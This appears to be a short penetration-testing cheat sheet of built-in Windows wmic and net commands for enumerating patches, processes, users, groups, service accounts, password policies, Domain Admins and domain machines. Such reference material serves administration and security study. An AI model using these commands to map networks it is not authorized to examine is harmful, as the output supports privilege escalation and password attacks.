Installed Patches
wmic qfe get Caption,Description,HotFixID,InstalledOn
Show installed Windows updates/patches.
System Info
wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List
Display host name, domain, manufacturer, model, user info.
Running Processes
wmic process list /format:list
List all running processes.
Domain Info
wmic ntdomain list /format:list
Show domain controller and domain name info.
User Accounts
wmic useraccount list /format:list
List local and domain users who logged in.
Groups
wmic group list /format:list
List local groups on the system.
Service Accounts
wmic sysaccount list /format:list
List system/service accounts used by services.
Domain Enumeration (net Commands)
net Commands)Command
Command Itself
Small Description
Local Password Policy
net accounts
Show local password and lockout policy.
Domain Password Policy
net accounts /domain
Show domain-wide password and lockout policy.
Domain Groups
net group /domain
List all domain groups.
Domain Admin Members
net group "Domain Admins" /domain
Show users in Domain Admin group.
User Info (Specific)
net user <ACCOUNT_NAME> /domain
Show info for specific domain user.
All Domain Users
net user /domain
List all users in the domain.
Domain Machines
net view /domain
List all machines joined to the domain.
Last updated